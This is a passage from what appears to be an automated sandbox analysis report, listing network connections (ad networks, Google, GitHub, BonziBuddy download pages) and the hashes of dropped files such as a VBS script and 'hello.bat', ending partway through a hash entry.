| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| NL | 185.89.210.212:443 | ib.adnxs.com | tcp |
| GB | 23.219.198.27:443 | ad.yieldlab.net | tcp |
| GB | 2.16.247.166:443 | rtt.bf-tools.net | tcp |
| GB | 92.123.128.171:443 | media-video.chip.de | tcp |
| GB | 92.123.128.171:443 | media-video.chip.de | tcp |
| GB | 92.123.128.171:443 | media-video.chip.de | tcp |
| GB | 92.123.128.171:443 | media-video.chip.de | tcp |
| US | 8.8.8.8:53 | 5baf1288cf.dl8.me | udp |
| IE | 52.51.160.17:443 | 5baf1288cf.dl8.me | tcp |
| FR | 5.196.111.69:443 | ssbsync.smartadserver.com | tcp |
| NL | 89.207.16.204:443 | prebid-match.dotomi.com | tcp |
| US | 35.186.253.211:443 | rtb.openx.net | tcp |
| DK | 37.157.2.228:443 | c1.adform.net | tcp |
| NL | 35.214.136.108:443 | x.bidswitch.net | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| NL | 198.47.127.18:443 | image8.pubmatic.com | tcp |
| DE | 185.212.44.250:443 | api.trustedoffers.de | tcp |
| NL | 198.47.127.18:443 | image8.pubmatic.com | tcp |
| NL | 198.47.127.18:443 | image8.pubmatic.com | tcp |
| DE | 217.79.187.69:443 | cm.adsafety.net | tcp |
| US | 8.8.8.8:53 | ad.360yield.com | udp |
| IE | 54.217.177.58:443 | ad.360yield.com | tcp |
| US | 13.107.246.64:443 | adsdkprod.azureedge.net | tcp |
| NL | 18.239.68.199:443 | aax.amazon-adsystem.com | tcp |
| IE | 34.241.186.48:443 | ups.xplosion.de | tcp |
| GB | 92.123.128.171:443 | media-video.chip.de | tcp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| GB | 23.219.198.27:443 | ad.yieldlab.net | tcp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| IE | 67.220.228.202:443 | aax-eu.amazon-adsystem.com | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| DE | 78.46.198.121:443 | chip.mycleverpush.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 104.26.15.31:443 | api.cleverpush.com | tcp |
| US | 104.26.14.31:443 | api.cleverpush.com | tcp |
| NL | 108.156.60.2:443 | cmp.chip.de | tcp |
| DE | 3.77.58.244:443 | crb.kargo.com | tcp |
| US | 35.244.159.8:443 | u.openx.net | tcp |
| US | 64.74.236.95:443 | tr.outbrain.com | tcp |
| US | 64.74.236.95:443 | tr.outbrain.com | tcp |
| GB | 23.219.197.58:443 | libs.outbrain.com | tcp |
| US | 151.101.194.132:443 | mv.outbrain.com | tcp |
| DE | 18.198.134.217:443 | mds.bf-tools.net | tcp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| NL | 185.158.249.69:443 | api.trustedoffers.de | udp |
| NL | 185.158.249.69:443 | api.trustedoffers.de | tcp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| NL | 185.158.249.69:443 | api.trustedoffers.de | tcp |
| DE | 91.215.100.39:443 | script.ioam.de | tcp |
| GB | 142.250.179.227:443 | id.google.com | udp |
| NL | 185.158.249.69:443 | api.trustedoffers.de | tcp |
| GB | 172.217.16.238:443 | img.youtube.com | udp |
| GB | 172.217.16.238:443 | img.youtube.com | tcp |
| DE | 185.212.44.250:443 | api.trustedoffers.de | tcp |
| GB | 142.250.180.22:443 | i.ytimg.com | tcp |
| DE | 185.212.44.250:443 | api.trustedoffers.de | tcp |
| DE | 185.212.44.250:443 | api.trustedoffers.de | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 216.58.212.206:443 | play.google.com | udp |
| GB | 216.58.201.106:443 | jnn-pa.googleapis.com | udp |
| GB | 142.250.180.22:443 | i.ytimg.com | udp |
| GB | 142.250.200.46:443 | img.youtube.com | udp |
| GB | 216.58.212.206:443 | play.google.com | udp |
| US | 8.8.8.8:53 | bonzibuddy.software.informer.com | udp |
| US | 104.22.16.194:443 | bonzibuddy.software.informer.com | tcp |
| US | 104.22.16.194:443 | bonzibuddy.software.informer.com | tcp |
| US | 8.8.8.8:53 | img.informer.com | udp |
| US | 8.8.8.8:53 | hits.informer.com | udp |
| US | 8.8.8.8:53 | i.informer.com | udp |
| US | 74.117.179.70:443 | img.informer.com | tcp |
| US | 74.117.179.70:443 | img.informer.com | tcp |
| US | 74.117.179.70:443 | img.informer.com | tcp |
| US | 74.117.179.70:443 | img.informer.com | tcp |
| US | 204.155.159.109:443 | hits.informer.com | tcp |
| US | 172.67.43.115:443 | i.informer.com | tcp |
| US | 172.67.43.115:443 | i.informer.com | tcp |
| US | 172.67.43.115:443 | i.informer.com | tcp |
| US | 172.67.43.115:443 | i.informer.com | tcp |
| US | 8.8.8.8:53 | software.informer.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 172.217.169.10:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| GB | 172.217.169.10:443 | content-autofill.googleapis.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| GB | 172.217.169.78:443 | fundingchoicesmessages.google.com | udp |
| BE | 64.233.184.84:443 | accounts.google.com | udp |
| GB | 172.217.169.78:443 | fundingchoicesmessages.google.com | udp |
| US | 104.22.16.194:443 | software.informer.com | tcp |
| GB | 142.250.187.225:443 | tpc.googlesyndication.com | udp |
| GB | 172.217.169.14:443 | google.com | udp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| GB | 216.58.204.66:443 | www.googletagservices.com | tcp |
| US | 204.155.159.109:443 | hits.informer.com | tcp |
| US | 204.155.159.109:443 | hits.informer.com | tcp |
| GB | 216.58.204.66:443 | www.googletagservices.com | udp |
| US | 8.8.8.8:53 | 6ec60dbd6301504edd7512c00fa2527b.safeframe.googlesyndication.com | udp |
| GB | 142.250.187.193:443 | 6ec60dbd6301504edd7512c00fa2527b.safeframe.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | e2c1.gcp.gvt2.com | udp |
| TW | 34.80.89.126:443 | e2c1.gcp.gvt2.com | tcp |
| GB | 216.58.204.66:443 | www.googletagservices.com | udp |
| TW | 34.80.89.126:443 | e2c1.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| GB | 172.217.169.67:443 | beacons.gvt2.com | tcp |
| US | 8.8.8.8:53 | e2c32.gcp.gvt2.com | udp |
| HK | 35.215.129.230:443 | e2c32.gcp.gvt2.com | tcp |
| HK | 35.215.129.230:443 | e2c32.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | beacons2.gvt2.com | udp |
| ZA | 142.251.47.227:443 | beacons2.gvt2.com | tcp |
| US | 8.8.8.8:53 | freedownloadmanager.org | udp |
| US | 74.117.181.203:80 | freedownloadmanager.org | tcp |
| US | 8.8.8.8:53 | www.freedownloadmanager.org | udp |
| US | 74.117.181.203:443 | www.freedownloadmanager.org | tcp |
| US | 204.155.159.109:443 | hits.informer.com | tcp |
| GB | 172.217.169.78:443 | fundingchoicesmessages.google.com | udp |
| GB | 172.217.169.78:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | bonzi-buddy.software.informer.com | udp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | udp |
| US | 204.155.159.109:443 | hits.informer.com | tcp |
| GB | 172.217.169.10:443 | content-autofill.googleapis.com | udp |
| GB | 216.58.204.66:443 | www.googletagservices.com | udp |
| US | 8.8.8.8:53 | 089977618b1b1aaa63a7010fa6b1be44.safeframe.googlesyndication.com | udp |
| GB | 142.250.187.225:443 | tpc.googlesyndication.com | udp |
| GB | 216.58.204.66:443 | www.googletagservices.com | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| GB | 142.250.200.1:443 | ep2.adtrafficquality.google | tcp |
| GB | 142.250.200.1:443 | ep2.adtrafficquality.google | udp |
| BE | 64.233.184.84:443 | accounts.google.com | udp |
| BE | 64.233.184.84:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 216.58.201.110:443 | play.google.com | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 216.58.201.118:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | bonzibuddy.updatestar.com | udp |
| DE | 109.199.124.234:443 | bonzibuddy.updatestar.com | tcp |
| DE | 109.199.124.234:443 | bonzibuddy.updatestar.com | tcp |
| US | 8.8.8.8:53 | e2c42.gcp.gvt2.com | udp |
| DE | 35.207.191.46:443 | e2c42.gcp.gvt2.com | tcp |
| GB | 142.250.178.3:80 | www.gstatic.com | tcp |
| GB | 172.217.169.67:443 | beacons.gvt2.com | udp |
| DE | 109.199.124.234:443 | bonzibuddy.updatestar.com | tcp |
| DE | 109.199.124.234:443 | bonzibuddy.updatestar.com | tcp |
| DE | 109.199.124.234:443 | bonzibuddy.updatestar.com | tcp |
| DE | 109.199.124.234:443 | bonzibuddy.updatestar.com | tcp |
| DE | 109.199.124.234:443 | bonzibuddy.updatestar.com | tcp |
| DE | 109.199.124.234:443 | bonzibuddy.updatestar.com | tcp |
| US | 8.8.8.8:53 | w8.updatestar.com | udp |
| DE | 109.199.124.234:443 | w8.updatestar.com | tcp |
| DE | 109.199.124.234:443 | w8.updatestar.com | tcp |
| DE | 109.199.124.234:443 | w8.updatestar.com | tcp |
| DE | 109.199.124.234:443 | w8.updatestar.com | tcp |
| DE | 109.199.124.234:443 | w8.updatestar.com | tcp |
| DE | 109.199.124.234:443 | w8.updatestar.com | tcp |
| DE | 109.199.124.234:443 | w8.updatestar.com | tcp |
| DE | 109.199.124.234:443 | w8.updatestar.com | tcp |
| GB | 142.250.180.3:443 | www.google.co.uk | udp |
| DE | 109.199.124.234:443 | w8.updatestar.com | tcp |
| DE | 109.199.124.234:443 | w8.updatestar.com | tcp |
| DE | 109.199.124.234:443 | w8.updatestar.com | tcp |
| DE | 109.199.124.234:443 | w8.updatestar.com | tcp |
| DE | 109.199.124.234:443 | w8.updatestar.com | tcp |
| US | 8.8.8.8:53 | df814e60693d57789698fb3febf2b330.safeframe.googlesyndication.com | udp |
| GB | 172.217.169.78:443 | fundingchoicesmessages.google.com | udp |
| GB | 172.217.169.78:443 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.187.225:443 | tpc.googlesyndication.com | udp |
| DE | 109.199.124.234:443 | w8.updatestar.com | tcp |
| DE | 109.199.124.234:443 | w8.updatestar.com | tcp |
| DE | 109.199.124.234:443 | w8.updatestar.com | tcp |
| US | 8.8.8.8:53 | www.temposearch.com | udp |
| NL | 81.171.31.78:443 | www.temposearch.com | tcp |
| NL | 81.171.31.78:443 | www.temposearch.com | tcp |
| US | 8.8.8.8:53 | uk.temposearch.com | udp |
| NL | 81.171.31.78:443 | uk.temposearch.com | tcp |
| GB | 216.58.204.66:443 | www.googletagservices.com | udp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| US | 8.8.8.8:53 | afs.googleusercontent.com | udp |
| GB | 142.250.180.1:443 | afs.googleusercontent.com | udp |
| US | 8.8.8.8:53 | syndicatedsearch.goog | udp |
| US | 8.8.8.8:53 | partner.googleadservices.com | udp |
| GB | 142.250.187.206:443 | syndicatedsearch.goog | tcp |
| GB | 142.250.187.206:443 | syndicatedsearch.goog | tcp |
| GB | 142.250.187.206:443 | syndicatedsearch.goog | udp |
| US | 8.8.8.8:53 | e008ddf51db05d225ad4c7c773e4324f.safeframe.googlesyndication.com | udp |
| GB | 142.250.180.1:443 | afs.googleusercontent.com | udp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| GB | 142.250.200.42:443 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn1.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn3.gstatic.com | udp |
| GB | 172.217.169.14:443 | encrypted-tbn0.gstatic.com | udp |
| GB | 216.58.201.110:443 | encrypted-tbn1.gstatic.com | tcp |
| GB | 216.58.201.110:443 | encrypted-tbn1.gstatic.com | tcp |
| GB | 142.250.200.46:443 | encrypted-tbn3.gstatic.com | tcp |
| GB | 142.250.200.46:443 | encrypted-tbn3.gstatic.com | tcp |
| BE | 64.233.184.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | udp |
| GB | 216.58.201.110:443 | encrypted-tbn1.gstatic.com | udp |
| US | 8.8.8.8:53 | superuser.com | udp |
| US | 8.8.8.8:53 | e2c20.gcp.gvt2.com | udp |
| CA | 34.95.44.106:443 | e2c20.gcp.gvt2.com | tcp |
| CA | 34.95.44.106:443 | e2c20.gcp.gvt2.com | tcp |
| US | 172.64.144.177:443 | superuser.com | tcp |
| US | 172.64.144.177:443 | superuser.com | tcp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | cdn.sstatic.net | udp |
| GB | 172.217.169.67:443 | beacons.gvt2.com | udp |
| US | 151.101.2.137:443 | code.jquery.com | tcp |
| GB | 142.250.200.42:443 | ajax.googleapis.com | udp |
| US | 104.18.40.222:443 | cdn.sstatic.net | tcp |
| US | 104.18.40.222:443 | cdn.sstatic.net | tcp |
| US | 104.18.40.222:443 | cdn.sstatic.net | tcp |
| US | 104.18.40.222:443 | cdn.sstatic.net | tcp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 104.18.87.42:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | www.gravatar.com | udp |
| US | 192.0.73.2:443 | www.gravatar.com | udp |
| US | 192.0.73.2:443 | www.gravatar.com | tcp |
| US | 104.18.87.42:443 | cdn.cookielaw.org | tcp |
| BE | 64.233.184.84:443 | accounts.google.com | udp |
| GB | 172.217.169.10:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| US | 104.18.32.137:443 | geolocation.onetrust.com | tcp |
| US | 8.8.8.8:53 | qa.sockets.stackexchange.com | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 172.64.152.233:443 | qa.sockets.stackexchange.com | tcp |
| US | 8.8.8.8:53 | stackoverflow-privacy.my.onetrust.com | udp |
| US | 8.8.8.8:53 | a5c3ee1ad1c61183072199669b3c1a53.safeframe.googlesyndication.com | udp |
| GB | 142.250.187.225:443 | tpc.googlesyndication.com | udp |
| US | 172.64.155.119:443 | stackoverflow-privacy.my.onetrust.com | tcp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | i.sstatic.net | udp |
| US | 8.8.8.8:53 | graph.facebook.com | udp |
| GB | 142.250.180.1:443 | lh3.googleusercontent.com | udp |
| US | 172.64.146.223:443 | i.sstatic.net | tcp |
| US | 172.64.146.223:443 | i.sstatic.net | tcp |
| US | 172.64.146.223:443 | i.sstatic.net | tcp |
| GB | 163.70.151.23:443 | graph.facebook.com | tcp |
| US | 8.8.8.8:53 | static.xx.fbcdn.net | udp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| US | 172.64.152.233:443 | qa.sockets.stackexchange.com | tcp |
| US | 8.8.8.8:53 | d2f4ff10c21dc6585bd062c1b7a45ead.safeframe.googlesyndication.com | udp |
| GB | 142.250.187.193:443 | d2f4ff10c21dc6585bd062c1b7a45ead.safeframe.googlesyndication.com | udp |
| US | 8.8.8.8:53 | d2k1bn3ko1qk4.cloudfront.net | udp |
| US | 8.8.8.8:53 | eu-west-1.event.prod.bidr.io | udp |
| NL | 18.239.82.131:443 | d2k1bn3ko1qk4.cloudfront.net | tcp |
| IE | 52.17.118.158:443 | eu-west-1.event.prod.bidr.io | tcp |
| IE | 52.17.118.158:443 | eu-west-1.event.prod.bidr.io | tcp |
| US | 8.8.8.8:53 | tjob.indeed.com | udp |
| US | 162.159.130.67:443 | tjob.indeed.com | tcp |
| US | 162.159.130.67:443 | tjob.indeed.com | tcp |
| US | 8.8.8.8:53 | prod.statics.indeed.com | udp |
| US | 8.8.8.8:53 | pxl.indeed.com | udp |
| US | 8.8.8.8:53 | creative.statics.indeed.com | udp |
| US | 8.8.8.8:53 | d2q79iu7y748jz.cloudfront.net | udp |
| NL | 18.238.243.17:443 | prod.statics.indeed.com | tcp |
| NL | 108.156.60.110:443 | d2q79iu7y748jz.cloudfront.net | tcp |
| US | 162.159.130.67:443 | pxl.indeed.com | tcp |
| US | 162.159.130.67:443 | pxl.indeed.com | tcp |
| NL | 13.227.219.121:443 | creative.statics.indeed.com | tcp |
| NL | 13.227.219.121:443 | creative.statics.indeed.com | tcp |
| NL | 13.227.219.121:443 | creative.statics.indeed.com | tcp |
| NL | 18.238.243.17:443 | prod.statics.indeed.com | tcp |
| US | 162.159.130.67:443 | pxl.indeed.com | udp |
| US | 172.64.152.233:443 | qa.sockets.stackexchange.com | tcp |
| US | 8.8.8.8:53 | 3bd4131be2bbc15bd242a9ad6744b0f0.safeframe.googlesyndication.com | udp |
| GB | 142.250.200.42:443 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | beacons5.gvt3.com | udp |
| GB | 163.70.151.23:443 | graph.facebook.com | udp |
| US | 172.64.152.233:443 | qa.sockets.stackexchange.com | tcp |
| US | 8.8.8.8:53 | 09d056c1e533dad2d460f33ec3727752.safeframe.googlesyndication.com | udp |
| GB | 142.250.180.1:443 | lh3.googleusercontent.com | udp |
| US | 192.0.73.2:443 | www.gravatar.com | udp |
| US | 192.0.73.2:443 | www.gravatar.com | tcp |
| US | 8.8.8.8:53 | 6418d76d8cd494ada7fcd66fb3509b21.safeframe.googlesyndication.com | udp |
| US | 172.64.152.233:443 | qa.sockets.stackexchange.com | tcp |
| GB | 142.250.187.193:443 | 6418d76d8cd494ada7fcd66fb3509b21.safeframe.googlesyndication.com | udp |
| US | 162.159.130.67:443 | pxl.indeed.com | udp |
| US | 162.159.130.67:443 | pxl.indeed.com | udp |
| NL | 13.227.219.121:443 | creative.statics.indeed.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | e0b4675dc8918136be4d496031bd4299.safeframe.googlesyndication.com | udp |
| US | 172.64.152.233:443 | qa.sockets.stackexchange.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| GB | 142.250.200.42:443 | ajax.googleapis.com | udp |
| GB | 216.58.201.110:443 | encrypted-tbn1.gstatic.com | udp |
| US | 8.8.8.8:53 | malwaretips.com | udp |
| US | 172.67.69.250:443 | malwaretips.com | tcp |
| US | 172.67.69.250:443 | malwaretips.com | tcp |
| US | 172.67.69.250:443 | malwaretips.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 142.250.187.225:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | www.googletagservices.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | secure.gravatar.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 172.217.169.78:443 | fundingchoicesmessages.google.com | udp |
| US | 192.0.73.2:443 | secure.gravatar.com | tcp |
| US | 192.0.73.2:443 | secure.gravatar.com | tcp |
| GB | 172.217.169.78:443 | fundingchoicesmessages.google.com | udp |
| BE | 64.233.184.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | e2c25.gcp.gvt2.com | udp |
| FR | 34.155.84.81:443 | e2c25.gcp.gvt2.com | tcp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.200.42:443 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 216.58.201.110:443 | play.google.com | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 142.250.178.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | e2c53.gcp.gvt2.com | udp |
| US | 35.217.93.191:443 | e2c53.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| US | 35.217.93.191:443 | e2c53.gcp.gvt2.com | tcp |
| US | 185.199.109.133:443 | user-images.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | user-images.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| GB | 172.217.169.67:443 | beacons.gvt2.com | udp |
| GB | 142.250.200.42:443 | content-autofill.googleapis.com | udp |
| US | 140.82.112.22:443 | collector.github.com | tcp |
| US | 140.82.112.22:443 | collector.github.com | tcp |
| US | 140.82.112.22:443 | collector.github.com | tcp |
| US | 185.199.109.133:443 | user-images.githubusercontent.com | tcp |
| US | 140.82.112.22:443 | collector.github.com | tcp |
| US | 185.199.109.133:443 | user-images.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | user-images.githubusercontent.com | tcp |
| US | 140.82.112.22:443 | collector.github.com | tcp |
| US | 140.82.112.22:443 | collector.github.com | tcp |
| GB | 142.250.180.10:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| GB | 142.250.178.3:80 | www.gstatic.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | e2c76.gcp.gvt2.com | udp |
| SA | 34.1.52.129:443 | e2c76.gcp.gvt2.com | tcp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 142.250.187.206:443 | www.youtube.com | udp |
| GB | 216.58.201.110:443 | www.youtube.com | udp |
| GB | 142.250.178.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| GB | 142.250.200.38:443 | static.doubleclick.net | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| GB | 142.250.178.10:443 | jnn-pa.googleapis.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
Files
memory/3700-52-0x0000000000400000-0x0000000000928000-memory.dmp
memory/3700-54-0x0000000000400000-0x0000000000928000-memory.dmp
memory/3472-55-0x0000000000400000-0x00000000005CC000-memory.dmp
memory/3472-56-0x0000000000400000-0x00000000005CC000-memory.dmp
memory/3260-57-0x0000000000400000-0x00000000005CC000-memory.dmp
memory/3260-58-0x0000000000400000-0x00000000005CC000-memory.dmp
\Users\Admin\AppData\Local\Temp\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\.ba1\wixstdba.dll
| MD5 | 4d20a950a3571d11236482754b4a8e76 |
| SHA1 | e68bd784ac143e206d52ecaf54a7e3b8d4d75c9c |
| SHA256 | a9295ad4e909f979e2b6cb2b2495c3d35c8517e689cd64a918c690e17b49078b |
| SHA512 | 8b9243d1f9edbcbd6bdaf6874dc69c806bb29e909bd733781fde8ac80ca3fff574d786ca903871d1e856e73fd58403bebb58c9f23083ea7cd749ba3e890af3d2 |
C:\Users\Admin\AppData\Local\Temp\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\.ba1\logo.png
| MD5 | d6bd210f227442b3362493d046cea233 |
| SHA1 | ff286ac8370fc655aea0ef35e9cf0bfcb6d698de |
| SHA256 | 335a256d4779ec5dcf283d007fb56fd8211bbcaf47dcd70fe60ded6a112744ef |
| SHA512 | 464aaab9e08de610ad34b97d4076e92dc04c2cdc6669f60bfc50f0f9ce5d71c31b8943bd84cee1a04fb9ab5bbed3442bd41d9cb21a0dd170ea97c463e1ce2b5b |
memory/2152-140-0x0000000000400000-0x00000000005CC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\957C.tmp\957D.tmp\957E.vbs
| MD5 | 67706bca9ceaba11530e05d351487003 |
| SHA1 | 3a5ed77f81b14093a5f18c4d46895bc7ea770fee |
| SHA256 | 190a0d994512ed000cf74bd40fb0502988c2ac48855b23a73fd905c0305fc30f |
| SHA512 | 902ac91678d85801a779acbc212c75beba72f8da996b0ed1b148a326c2dd635b88210f9a503fbbffa5271335483eae972e6a00acbc01ec013cf355c080444598 |
C:\Program Files (x86)\hello.bat
| MD5 | b86fddd2b764f079615be5d4dc3e158d |
| SHA1 | 2510479054db1fe52cc2dcd3c7033d91204cb367 |
| SHA256 | 2b2114784d15b0b0d5475256851b4d0d4da7181198c2a93a304ecedb98eaf091 |
| SHA512 | 915363bc9f6e665358c8d25f5f5f51d64c53cb755be999013217162b126705ce641ea809047bc84511db7e3e383b848ec3932924baa8926d51a51d0037a5ca63 |
C:\Program Files (x86)\hello.jpg
| MD5 | 057ea45c364eb2994808a47b118556a2 |
